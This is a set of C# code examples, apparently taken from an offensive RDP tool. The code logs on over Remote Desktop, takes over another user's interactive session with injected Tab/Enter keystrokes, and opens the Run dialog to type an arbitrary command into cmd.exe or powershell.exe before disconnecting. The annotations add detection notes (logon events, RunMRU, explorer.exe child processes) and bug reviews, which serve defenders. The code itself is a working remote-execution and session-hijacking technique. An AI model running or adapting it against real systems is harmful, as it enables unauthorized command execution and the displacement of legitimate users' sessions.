Ejemplo n.º 1
        /// <summary>
        /// Handles the RDP ActiveX control's logon-error event: records and prints the error code, then
        /// either answers the on-screen "another user is logged on" prompt with injected keystrokes
        /// (code -5 with <c>takeover</c> set) or terminates the process (any other code except -2).
        /// </summary>
        /// <param name="sender">The control raising the event; cast to AxMsRdpClient9NotSafeForScripting in the takeover branch.</param>
        /// <param name="e">Event data; only <c>lError</c> is read.</param>
        /// <remarks>
        /// Detection note: the takeover branch displaces an interactive user's session without any
        /// human at the keyboard. On the target this is normally visible through RDP logon and
        /// session reconnect/disconnect auditing (for example Security events 4624, 4778 and 4779),
        /// provided that auditing is enabled - confirm against the audit policy in use.
        /// </remarks>
        private void RdpConnectionOnOnLogonError(object sender, IMsTscAxEvents_OnLogonErrorEvent e)
        {
            LogonErrorCode = e.lError;
            // The code is compared with negative values below, so the (uint) cast wraps it before the
            // enum lookup; errorstatus is null when LogonErrors has no member with that value.
            var errorstatus = Enum.GetName(typeof(LogonErrors), (uint)LogonErrorCode);

            Console.WriteLine("[-] Logon Error           :  {0} - {1}", LogonErrorCode, errorstatus);
            Thread.Sleep(1000);

            // -5 is treated as "another user is logged on" (see the message printed below).
            if (LogonErrorCode == -5 && takeover == true)
            {
                // it doesn't go to the logon event, so this has to be done here
                var rdpSession = (AxMsRdpClient9NotSafeForScripting)sender;
                Thread.Sleep(1000);
                keydata = (IMsRdpClientNonScriptable)rdpSession.GetOcx();
                Console.WriteLine("[+] Another user is logged on, asking to take over session");
                // Tab, then Enter pressed and released: the keystrokes are sent blind with fixed
                // delays; nothing here checks that the expected prompt is actually on screen.
                SendElement("Tab");
                Thread.Sleep(500);
                SendElement("Enter+down");
                Thread.Sleep(500);
                SendElement("Enter+up");
                Thread.Sleep(500);
                Console.WriteLine("[+] Sleeping for 30 seconds");
                // Blocks the handler thread for 31 s (the message above says 30).
                Task.Delay(31000).GetAwaiter().GetResult();
                // NOTE(review): Marshal.ReleaseComObject accepts only runtime callable wrappers. If
                // AxMsRdpClient9NotSafeForScripting is an AxHost-derived control, the first call
                // throws ArgumentException and keydata is never released - confirm.
                Marshal.ReleaseComObject(rdpSession);
                Marshal.ReleaseComObject(keydata);
            }
            // -2 is neither handled nor fatal here; its meaning is not shown in this method.
            else if (LogonErrorCode != -2)
            {
                // Exit status is 0 even though this is an error path, so a wrapper script or a log
                // review cannot tell a failed logon from a clean run by exit code alone.
                Environment.Exit(0);
            }
        }
Ejemplo n.º 2
        /// <summary>
        /// Translates a key chord into scan codes and injects it into the remote session through
        /// the RDP control's non-scriptable SendKeys interface.
        /// </summary>
        /// <param name="keyCodes">Virtual-key codes in press order; only the first 10 are processed.</param>
        /// <param name="serverBase">Server whose RDP client control receives the keystrokes.</param>
        /// <remarks>
        /// Modifier keys are queued as key-down entries. When a non-modifier key arrives, key-up
        /// entries for everything queued are appended in reverse order, the batch is sent and the
        /// queue is reset. Modifiers that are never followed by a non-modifier are not sent.
        /// NOTE(review): the queue can reach 20 entries (10 downs plus 10 ups) and is written with
        /// unchecked indexing into SendKeysData's buffers; confirm they hold at least 20 elements.
        /// </remarks>
        public unsafe static void Send(Keys[] keyCodes, ServerBase serverBase)
        {
            Server    targetServer = serverBase.ServerNode;
            RdpClient rdpClient    = targetServer.Client;
            IMsRdpClientNonScriptable keySink = (IMsRdpClientNonScriptable)rdpClient.GetOcx();
            int keyCount = keyCodes.Length;

            try
            {
                SendKeysData batch = default(SendKeysData);
                bool *       upFlagsPtr  = (bool *)batch.keyUp;
                int *        scanCodePtr = batch.keyData;
                int          queued      = 0;
                for (int index = 0; index < keyCount && index < 10; index++)
                {
                    // Map type 0 is presumably virtual-key to scan code; Util.MapVirtualKey is
                    // defined outside this listing.
                    int scanCode = (int)Util.MapVirtualKey((uint)keyCodes[index], 0u);

                    // Queue the key-down entry.
                    batch.keyData[queued] = scanCode;
                    batch.keyUp[queued] = 0;
                    queued++;

                    if (IsModifier(keyCodes[index]))
                    {
                        // Keep accumulating until a non-modifier completes the chord.
                        continue;
                    }

                    // Release every queued key, most recently pressed first.
                    int pressedCount = queued;
                    for (int back = pressedCount - 1; back >= 0; back--)
                    {
                        batch.keyData[queued] = batch.keyData[back];
                        batch.keyUp[queued] = 1;
                        queued++;
                    }

                    keySink.SendKeys(queued, ref *upFlagsPtr, ref *scanCodePtr);
                    queued = 0;
                }
            }
            catch
            {
                // Every failure, including COM errors from SendKeys, is discarded here, so the
                // caller cannot tell whether the keystrokes were delivered.
            }
        }
Ejemplo n.º 3
        /// <summary>
        /// Handles the RDP control's login-complete event: waits for the desktop, opens the Run
        /// dialog with injected Win+R keystrokes, hands off to the configured execution helper and
        /// then disconnects the session.
        /// </summary>
        /// <param name="sender">The RDP client control; cast to AxMsRdpClient9NotSafeForScripting.</param>
        /// <param name="e">Unused.</param>
        /// <remarks>
        /// Detection note: nothing is executed through a remote-execution API; the session behaves
        /// like a very short interactive logon that types into the Run dialog. Defenders should look
        /// for an RDP logon followed within seconds by a shell or other process started from
        /// explorer.exe and an immediate disconnect. Run-dialog input is normally also recorded in
        /// the logged-on user's RunMRU registry key.
        /// </remarks>
        private void RdpConnectionOnOnLoginComplete(object sender, EventArgs e)
        {
            var client = (AxMsRdpClient9NotSafeForScripting)sender;

            Console.WriteLine("[+] Connected to          :  {0}", target);
            Thread.Sleep(1000);
            keydata = (IMsRdpClientNonScriptable)client.GetOcx();

            // A logon error of -2 is reported as "user not currently logged in": allow extra time
            // for the new session's desktop to come up before any keystroke is sent.
            if (LogonErrorCode == -2)
            {
                Console.WriteLine("[+] User not currently logged in, creating new session");
                Task.Delay(10000).GetAwaiter().GetResult();
            }

            // Only the label is chosen here; what runtype does is decided in helpers defined elsewhere.
            string privilegeLabel = runtype != string.Empty ? "elevated" : "non-elevated";
            Console.WriteLine("[+] Execution priv type   :  {0}", privilegeLabel);
            Thread.Sleep(1000);

            // Win+R pressed, then released, with fixed delays and no check of what is on screen.
            SendElement("Win+R+down");
            Thread.Sleep(500);
            SendElement("Win+R+up");
            Thread.Sleep(1000);

            switch (execwith)
            {
                case "cmd":
                    RunConsole("cmd.exe");
                    break;
                case "powershell":
                case "ps":
                    RunConsole("powershell.exe");
                    break;
                default:
                    RunRun();
                    break;
            }

            Thread.Sleep(1000);
            Console.WriteLine("[+] Disconnecting from    :  {0}", target);
            client.Disconnect();
        }
Ejemplo n.º 4
        /// <summary>
        /// Handles the RDP control's login-complete event: opens the Run dialog with injected
        /// Win+R keystrokes, types the configured command (directly, or inside cmd.exe or
        /// powershell.exe), then disconnects the session.
        /// </summary>
        /// <param name="sender">The RDP client control; cast to AxMsRdpClient9NotSafeForScripting.</param>
        /// <param name="e">Unused.</param>
        /// <remarks>
        /// Detection notes: the command is lower-cased before it is typed, so command lines produced
        /// by this code contain no upper-case characters. Everything goes through the Run dialog, so
        /// the started process is normally a child of explorer.exe in a freshly created RDP session,
        /// and Run-dialog input is normally recorded in the logged-on user's RunMRU registry key.
        /// The session is disconnected rather than logged off, which leaves a disconnected session
        /// on the host.
        /// </remarks>
        private void RdpConnectionOnOnLoginComplete(object sender, EventArgs e)
        {
            // A logon error of -2 is reported as "user not currently logged in": wait 10 s for the
            // new session before doing anything else.
            if (LogonErrorCode == -2)
            {
                Console.WriteLine($"[+] User not currently logged in, creating new session");
                Task.Delay(10000).GetAwaiter().GetResult();
            }
            var rdpSession = (AxMsRdpClient9NotSafeForScripting)sender;

            Console.WriteLine("[+] Connected to          :  {0}", target);
            Thread.Sleep(1000);
            keydata = (IMsRdpClientNonScriptable)rdpSession.GetOcx();
            string enterdown = "Enter+down";
            string enterup   = "Enter+up";

            Thread.Sleep(1000);

            // Win+R pressed, then released. All keystrokes in this method are sent blind with fixed
            // delays; nothing verifies that the Run dialog or the shell window has focus.
            SendElement("Win+R+down");
            Thread.Sleep(500);
            SendElement("Win+R+up");
            Thread.Sleep(1000);

            if (execwith == "cmd")
            {
                Console.WriteLine("[+] Executing {0} from cmd.exe", cmd.ToLower());
                // Start the shell from the Run dialog.
                SendText("cmd.exe");
                Thread.Sleep(1000);

                SendElement(enterdown);
                Thread.Sleep(500);
                SendElement(enterup);

                Thread.Sleep(500);
                // Type the lower-cased command into the shell window and submit it.
                SendText(cmd.ToLower());

                Thread.Sleep(1000);

                SendElement(enterdown);
                Thread.Sleep(500);
                SendElement(enterup);

                Thread.Sleep(500);
                // "exit" is typed but no Enter follows it in this method.
                SendText("exit");
            }
            else if (execwith == "powershell" || execwith == "ps")
            {
                // Same sequence as the cmd branch, with powershell.exe as the shell.
                Console.WriteLine("[+] Executing {0} from powershell.exe", cmd.ToLower());
                SendText("powershell.exe");
                Thread.Sleep(1000);

                SendElement(enterdown);
                Thread.Sleep(500);
                SendElement(enterup);

                Thread.Sleep(500);
                SendText(cmd.ToLower());

                Thread.Sleep(1000);

                SendElement(enterdown);
                Thread.Sleep(500);
                SendElement(enterup);

                Thread.Sleep(500);
                // "exit" is typed but no Enter follows it in this method.
                SendText("exit");
            }
            else
            {
                // No shell requested: the command itself is typed into the Run dialog.
                Console.WriteLine("[+] Executing {0}", cmd.ToLower());
                SendText(cmd.ToLower());

                Thread.Sleep(1500);

                SendElement(enterdown);
                Thread.Sleep(500);
                SendElement(enterup);
            }

            Thread.Sleep(1000);
            Console.WriteLine("[+] Disconnecting from    :  {0}", target);
            // Disconnect only: the remote session is not logged off by this method.
            rdpSession.Disconnect();
        }